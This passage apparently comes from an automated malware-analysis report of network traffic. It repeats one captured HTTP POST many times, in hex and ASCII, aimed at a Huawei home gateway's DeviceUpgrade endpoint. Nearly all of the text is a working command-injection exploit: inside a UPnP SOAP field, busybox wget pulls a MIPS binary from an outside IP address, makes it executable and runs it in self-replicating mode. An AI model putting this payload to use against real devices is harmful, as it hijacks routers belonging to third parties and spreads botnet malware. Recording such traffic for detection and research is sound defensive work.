6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 